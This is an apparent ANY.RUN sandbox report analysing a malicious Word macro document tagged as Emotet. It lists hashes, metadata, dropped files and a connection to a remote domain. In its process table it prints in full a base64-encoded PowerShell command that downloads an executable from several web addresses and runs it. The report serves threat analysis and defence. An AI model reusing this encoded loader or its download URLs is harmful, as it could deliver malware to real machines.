analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Dok_2019_09_ 19_DE839556.doc

Full analysis: https://app.any.run/tasks/023b768f-2665-4315-bfbf-b1569648376a
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: September 19, 2019, 12:21:21
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: seize mobile Handmade Fresh Chicken, Subject: generating, Author: Meagan Kuvalis, Comments: Kuwaiti Dinar, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Sep 19 08:11:00 2019, Last Saved Time/Date: Thu Sep 19 08:11:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5:

16A064689918137707FC9E92671FA681

SHA1:

E7FE088857FC5B07B08C461363CFCFA9CE9DDF97

SHA256:

820C65C6EF01642AB6280B5CC80F98B24572841D5BCEC34769037BDE8B3D2CD0

SSDEEP:

6144:dxNVifQ2eqPobQZbrwIQOVPLkIq7NSU4jJntATfDQ3XvbbD:dxNVifQ2eqPobQZbrwIQOFXq7NSU4VeU

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 71.exe (PID: 2308)
      • 71.exe (PID: 2968)
      • 71.exe (PID: 2432)
      • 71.exe (PID: 3212)

  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 2396)

    • PowerShell script executed

      • powershell.exe (PID: 2396)

    • Creates files in the user directory

      • powershell.exe (PID: 2396)

    • Application launched itself

      • 71.exe (PID: 2968)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2396)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3516)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3516)

    • Reads settings of System Certificates

      • powershell.exe (PID: 2396)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: seize mobile Handmade Fresh Chicken
Subject: generating
Author: Meagan Kuvalis
Keywords: -
Comments: Kuwaiti Dinar
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:09:19 07:11:00
ModifyDate: 2019:09:19 07:11:00
Pages: 1
Words: 95
Characters: 547
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Zulauf and Sons
Lines: 4
Paragraphs: 1
CharCountWithSpaces: 641
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Kohler
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
6
Malicious processes
0
Suspicious processes
4

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs powershell.exe 71.exe no specs 71.exe no specs 71.exe no specs 71.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3516"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Dok_2019_09_ 19_DE839556.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2396powershell -encod JABhAE0AUABjAFoAMwBqAD0AJwBZAFgAaAB3AE0AagAnADsAJABSAGkAUwBUADAAcAAgAD0AIAAnADcAMQAnADsAJABiAE0ATQA2AFAAbwA9ACcAdABiAHEAMwAyAFoARABrACcAOwAkAG4AVgBBADkAMgA4AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABSAGkAUwBUADAAcAArACcALgBlAHgAZQAnADsAJABsAEkAMQA0AHoAYQA2AD0AJwBmAFcASQBDAE8AUQB3ACcAOwAkAGwAdQBIAEMAbgBaAFMAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAGIAQwBsAEkAZQBOAHQAOwAkAHQARgBrADMARgBOAD0AJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgB1AG4AaQB0AGUAZABtAGUAZABzAHMAaABvAHAALgBjAG8AbQAvAHgAeABqAHkAdwAvAEgAbgBGAFoASQBLAFIALwBAAGgAdAB0AHAAOgAvAC8AYwBlAG4AZwBpAHoAZwB1AGwAZQByAC4AYwBvAG0ALgB0AHIALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AUgB2AHAASABiAHkAZQAvAEAAaAB0AHQAcABzADoALwAvAGsAZQB0AG8AcgBlAGMAaQBwAGUAcwBsAGMAaABmAC4AcwBpAHQAZQAvAHQAZQBzAHQALwByADQAaQBhAGQALQBiAG0AMABpADcAZgAtADcANwAwADcAOAA1AC8AQABoAHQAdABwAHMAOgAvAC8AYgBvAG4AZABiAGUAbgBnAGEAbABzAC4AaQBuAGYAbwAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBpADYAMQAzADQALQA5AGYAMAAtADEANwA0ADcAMAAwADYAOAAvAEAAaAB0AHQAcABzADoALwAvAGIAaQBrAGUAbABvAHYAZQByAHMALgBiAGwAbwBnAC4AYgByAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ATQBnAHEARQBtAGIAQgBCAC8AJwAuACIAUwBgAFAAbABJAHQAIgAoACcAQAAnACkAOwAkAEkAbAA4AG0AdQBjAEEAPQAnAEoAbgAwAGQATABMAEcAVgAnADsAZgBvAHIAZQBhAGMAaAAoACQASQB6AEUAegA4AGgAbQAwACAAaQBuACAAJAB0AEYAawAzAEYATgApAHsAdAByAHkAewAkAGwAdQBIAEMAbgBaAFMALgAiAEQAYABPAGAAdwBuAEwATwBBAEQARgBgAGkATABlACIAKAAkAEkAegBFAHoAOABoAG0AMAAsACAAJABuAFYAQQA5ADIAOAApADsAJABoAFgAegBBADMARQBHAD0AJwBWAGIAbQBDAFIAZgBaAGIAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABuAFYAQQA5ADIAOAApAC4AIgBMAGUAbgBHAGAAVABIACIAIAAtAGcAZQAgADIAOQA0ADAANwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYQBgAFIAdAAiACgAJABuAFYAQQA5ADIAOAApADsAJABVADQAdgBmAHUAdgBsAD0AJwB6ADcANQBVAGQAZAAnADsAYgByAGUAYQBrADsAJABpAEUAaABuADMAUgBxAD0AJwBpAHIAMAB3AHYAbgBPACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAG8AbgBSAFIASABpADAAYQA9ACcAYwBSAGsAdwBTAEIAMgAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2968"C:\Users\admin\71.exe" C:\Users\admin\71.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2308"C:\Users\admin\71.exe" C:\Users\admin\71.exe71.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2432--70766e04C:\Users\admin\71.exe71.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3212--70766e04C:\Users\admin\71.exe71.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 694
Read events
1 217
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
6
Text files
0
Unknown types
43

Dropped files

PID
Process
Filename
Type
3516WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9ACD.tmp.cvr
MD5:
SHA256:
3516WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\69557C2.wmfwmf
MD5:C7C00F7759052232CCC06C5200975BA8
SHA256:1CC7915435A55F638678216644EF70315A39423E35A64FDB96F5463B01C39709
3516WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:81D10EEE4EE10A42408D2CF3F8E19EAC
SHA256:AC0CA9C4CC4CED55CC54C5648489052970BE90EEB23A27822790A66D9A6DCE58
3516WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\65FD6AA1.wmfwmf
MD5:1370768C2E0E31901449DBA2F6499B78
SHA256:4935909F4F3E56FBB9A02E185F0A5BA495A61D93B403DE2752718784A3393552
3516WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$k_2019_09_ 19_DE839556.docpgc
MD5:284953952C3B7C0EC91A3084225958F5
SHA256:66ED84A13E8772DFF7A278433E320FE9479C0CF1B41FE5F68B4C3B8D23281664
3516WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8486819.wmfwmf
MD5:D35F5972C6E3A00BB24B8FA2CEB93FAA
SHA256:491500F3AAB3C08855EA4E777069A92213429831351B0D4FA9DCA65C73439073
3516WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\687EC0DB.wmfwmf
MD5:46DEF7EFD221D616992CAD86F6682134
SHA256:1958BE16E1D093337194F8CC2C906C84630FF348AB5FC9DE0B7433DF6C81CFAE
3516WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4574797D.wmfwmf
MD5:CF50486206467F3F565D082795AD496F
SHA256:B332F00DBBA16F725EAEE5F9A337CFBFFF73494614741241EAB0E69C64E2F169
3516WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\474F6094.wmfwmf
MD5:46D9F1586203EC428ECC699CD430F263
SHA256:8ABC1F3740BDA36A000094EAB275B759F15C2E5242867B8436E7886D1849A3B6
3516WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83E7D91F.wmfwmf
MD5:85946955E42EC475401C5977914B09E1
SHA256:3021F6617EB04A319A2BC0D2376F6F2398752C51B1940B556FE0C05CBC1E1020
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2396
powershell.exe
104.28.27.31:443
www.unitedmedsshop.com
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
www.unitedmedsshop.com
  • 104.28.27.31
  • 104.28.26.31
unknown

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Dok_2019_09_ 19_DE839556.doc